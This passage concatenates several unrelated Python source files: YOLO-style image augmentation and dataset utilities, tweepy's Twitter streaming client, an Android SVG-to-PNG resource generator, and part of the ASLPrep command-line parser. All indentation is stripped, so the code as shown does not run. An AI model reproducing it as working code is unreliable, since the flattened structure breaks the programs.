x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b,
x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True,
scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[
1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[
0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT,
value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1,
shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective,
perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective,
perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(
random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(
random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate,
0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate,
0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (
M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height),
borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height),
borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4,
2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4,
n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20,
area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (
w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (
ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(
0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(
0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [
0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in
range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(
path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (
path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array(
[x.split() for x in f.read().strip().splitlines()],
dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (
path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0,
w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[
2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(
0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights,
k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt',
'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
streaming.py | # Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
import logging
import requests
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
from HTMLParser import HTMLParser
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson, urlencode_noplus
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(HTMLParser().unescape(raw_data))
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrvies"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
self.buffer_size = options.get("buffer_size", 1500)
self.api = API()
self.session = requests.Session()
self.session.headers = options.get("headers") or {}
self.session.params = None
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exception = None
while self.running:
if self.retry_count is not None and error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST', url, data=self.body,
timeout=self.timeout, stream=True, auth=auth)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start, self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2, self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
# This is still necessary, as a SSLError can actually be thrown when using Requests
# If it's not time out treat it like any other exception
if isinstance(exc, ssl.SSLError) and not (exc.args and 'timed out' in str(exc.args[0])):
exception = exc
break
if self.listener.on_timeout() == False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exception:
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.session = requests.Session()
if exception:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exception)
raise
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
while self.running:
# Note: keep-alive newlines might be inserted before each length value.
# read until we get a digit...
c = '\n'
for c in resp.iter_content():
if c == '\n':
continue
break
delimited_string = c
# read rest of delimiter length..
d = ''
for d in resp.iter_content():
if d != '\n':
delimited_string += d
continue
break
# read the next twitter status object
if delimited_string.strip().isdigit():
next_status_obj = resp.raw.read( int(delimited_string) )
if self.running:
self._data(next_status_obj)
if resp.raw._fp.isclosed():
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self, stall_warnings=False, _with=None, replies=None,
track=None, locations=None, async=False, encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host='userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
encoded_track = [s.encode(encoding) for s in track]
self.session.params['track'] = ','.join(encoded_track)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, language=None):
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json?delimited=length' % STREAM_VERSION
if language:
self.url += '&language=%s' % language
self.parameters['language'] = language
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8'):
self.session.params = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
encoded_follow = [s.encode(encoding) for s in follow]
self.session.params['follow'] = ','.join(encoded_follow)
if track:
encoded_track = [s.encode(encoding) for s in track]
self.session.params['track'] = ','.join(encoded_track)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if languages:
self.session.params['language'] = ','.join(map(str, languages))
self.body = urlencode_noplus(self.session.params)
self.session.params['delimited'] = 'length'
self.host = 'stream.twitter.com'
self._start(async)
def sitestream(self, follow, stall_warnings=False, with_='user', replies=False, async=False):
self.parameters = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.parameters['follow'] = ','.join(map(str, follow))
self.parameters['delimited'] = 'length'
if stall_warnings:
self.parameters['stall_warnings'] = stall_warnings
if with_:
self.parameters['with'] = with_
if replies:
self.parameters['replies'] = replies
self.body = urlencode_noplus(self.parameters)
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
generate.py | #!python3
# -*- coding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2015 Lucas Nunes de Lima
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#-------------------------------------------------------------------------------
# Android SVG to Android Resource
# Requires:
# inkscape
# pngout
# python3 (of course)
import os
import glob
import xml.etree.ElementTree as ET
import subprocess
import platform
import sys
import shelve
import threading
import time
import settings
import ignore
import convert_jpg
print('RES Builder')
print('----------------------------------------------------------')
# Get inkscape path
if len(settings.inkscape_path) == 0:
print('Invalid inkscape path. Aborted.')
exit(-1)
else:
sys.path.insert(0, settings.inkscape_path)
# Target DPI:
# [0.75, 1.0, 1.5, 2.0, 3.0, 4.0]
# ['ldpi', 'mdpi', 'hdpi', 'xhdpi', 'xxhdpi', 'xxxhdpi']
base_dpi = 1.0
dpis = {'ldpi' : 0.75 / base_dpi, 'mdpi' : 1.0 / base_dpi,
'hdpi' : 1.5 / base_dpi, 'xhdpi' : 2.0 / base_dpi,
'xxhdpi' : 3.0 / base_dpi, 'xxxhdpi' : 4.0 / base_dpi}
def do_work():
lock = threading.Lock()
while 1:
with lock:
if len(svgs) == 0:
break
process_svg()
pass
def process_svg():
global index
lock = threading.Lock()
with lock:
if len(svgs) == 0:
return
svg = svgs[0]
svgs.remove(svg)
svg = os.path.normpath(svg)
svg = svg.replace('\\\\','/').replace('\\','/').replace('//','/')
tree = ET.parse(svg)
root = tree.getroot()
widthStr = root.attrib['width']
heightStr = root.attrib['height']
base_path = svg.replace(working_dir, '')
print_name = base_path.replace(current_input_path, '')
if widthStr.find('%') != -1:
viewBox = root.attrib['viewBox'].split(' ')
widthStr = viewBox[2]
heightStr = viewBox[3]
widthStr = widthStr.replace('px','')
heightStr = heightStr.replace('px','')
width = float(widthStr)
height = float(heightStr)
for index in range(len(settings.output_quality)):
dpi_name = settings.output_quality[index]
dpi = dpis[dpi_name]
twidth = float(round(width * dpi))
theight = float(round(height * dpi))
target = os.path.basename(svg)
target = target.replace('.svg', '.png')
target = target.lower()
ignore_it = False
for ignored_file in ignore.files:
if os.path.normpath(ignored_file) == os.path.normpath(base_path):
ignore_it = True
break
thread_name = '[' + threading.current_thread().name + '] '
if ignore_it:
with lock:
print(thread_name + print_name + ' > ignored')
break
else:
with lock:
print(thread_name + print_name + ' > ' + dpi_name)
is_mipmap = 'ic_launcher' in os.path.normpath(base_path)
is_adaptive = 'ic_launcher_adaptive' in os.path.normpath(base_path)
if is_mipmap:
if is_adaptive:
current_path = current_output_path + '/mipmap-' + dpi_name + '-v26/'
else:
current_path = current_output_path + '/mipmap-' + dpi_name + '/'
else:
current_path = current_output_path + '/drawable-' + dpi_name + '/'
if not os.path.exists(current_path):
os.makedirs(current_path)
work_target = current_path + target
work_target = os.path.normpath(work_target)
work_target = work_target.replace('\\\\','/').replace('\\','/').replace('//','/')
if os.path.isfile(work_target) or os.path.isfile(work_target.replace('.png','.jpg')):
continue
ls = subprocess.Popen([settings.inkscape_path, svg, '-z',
'-e' + work_target,
'-w' + str(twidth),
'-h' + str(theight)],
shell = True,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
ls.wait()
if not is_mipmap:
export_to_jpg = False
for export_file in convert_jpg.files:
if os.path.normpath(export_file) in os.path.normpath(base_path):
export_to_jpg = True
break
if export_to_jpg:
print(thread_name + print_name + ' > converted')
ls = subprocess.Popen([settings.image_magick, work_target, '-quality', '50',
work_target.replace('.png','.jpg')],
shell = True,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
ls.wait()
print(thread_name + print_name + ' > removed')
os.remove(work_target)
## -------------
# Get target svgs.
for i in range(len(settings.input_path)):
current_input_path = settings.input_path[i]
if len(settings.output_path) == 1:
current_output_path = settings.output_path[0]
else:
current_output_path = settings.output_path[i]
svgs = []
for root, dirs, files in os.walk(current_input_path):
for file in files:
if file.endswith('.svg'):
print(os.path.join(root, file))
svgs.append(os.path.join(root, file))
#files = glob.glob(current_input_path + '*.svg')
#files = files + glob.glob(current_input_path + '*/*.svg')
print('Found ' + str(len(svgs)) + ' file(s).')
print('Output: ' + current_output_path)
print('\nWorking:')
working_dir = os.path.dirname(os.path.abspath(__file__))
working_dir = working_dir.replace('\\', '/')
index = 0
for index in range(len(settings.output_quality)):
dpi_name = settings.output_quality[index]
current_path = current_output_path + '/mipmap-' + dpi_name + '/'
if not os.path.exists(current_path):
os.makedirs(current_path)
current_path = current_output_path + '/drawable-' + dpi_name + '/'
if not os.path.exists(current_path):
os.makedirs(current_path)
threads = []
for current_thread in range(settings.number_of_threads):
try:
tr = threading.Thread(target=do_work)
tr.daemon = True
tr.start()
threads.append(tr)
except:
print('Error: unable to start thread')
# join all threads
for t in threads:
t.join()
pass
|
run.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ASL preprocessing workflow."""
import os
import re
from pathlib import Path
import logging
import sys
import gc
import uuid
import warnings
import json
from argparse import ArgumentParser
from argparse import ArgumentDefaultsHelpFormatter
from multiprocessing import cpu_count
from time import strftime
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def check_deps(workflow):
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd') and
which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object."""
from packaging.version import Version
from ..__about__ import __version__
from .version import check_latest, is_flagged
from ..niworkflows.utils.spaces import Reference, SpatialReferences, OutputReferencesAction
#verstr = 'ASLPrep v{}'.format(__version__)
#currentv = Version(__version__)
#is_release = not any((currentv.is_devrelease, currentv.is_prerelease, currentv.is_postrelease))
currentv='0.0.1'
parser = ArgumentParser(description='ASLPrep: ASL PREProcessing workflows',
formatter_class=ArgumentDefaultsHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store', type=Path,
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store', type=Path,
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'aslprep (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version="0.0.1")
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--skip_bids_validation', '--skip-bids-validation', action='store_true',
default=True,
help='assume the input dataset is BIDS compliant and skip the validation')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument(
'--bids-filter-file', action='store', type=Path, metavar='PATH',
help='a JSON file describing custom BIDS input filter using pybids '
'{<suffix>:{<entity>:<filter>,...},...} '
'(https://github.com/bids-standard/pybids/blob/master/bids/layout/config/bids.json)')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_bids.add_argument('--echo-idx', action='store', type=int,
help='select a specific echo to be processed in a multiecho series')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for ASLPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument('--md-only-boilerplate', action='store_true',
default=False,
help='skip generation of HTML and LaTeX formatted citation with pandoc')
#g_perfm.add_argument('--error-on-aroma-warnings', action='store_true',
# default=False,
#help='Raise an error if ICA_AROMA does not produce sensible output '
#'(e.g., if all the components are classified as signal or noise)')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming', 'sbref'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument(
'--output-spaces', nargs='*', action=OutputReferencesAction, default=SpatialReferences(),
help="Standard and non-standard spaces to resample anatomical and functional images to" )
g_conf.add_argument('--bold2t1w-dof', action='store', default=6, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'6 degrees (rotation and translation) are used by default.')
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
g_conf.add_argument(
'--dummy-scans', required=False, action='store', default=None, type=int,
help='Number of non steady state volumes.')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument(
'--skull-strip-template', default='OASIS30ANTs', type=Reference.from_string,
help='select a template for skull-stripping with antsBrainExtraction')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=Path,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
g_fs.add_argument(
'--fs-subjects-dir', metavar='PATH', type=Path,
help='Path to existing FreeSurfer subjects directory to reuse. '
'(default: OUTPUT_DIR/freesurfer)')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
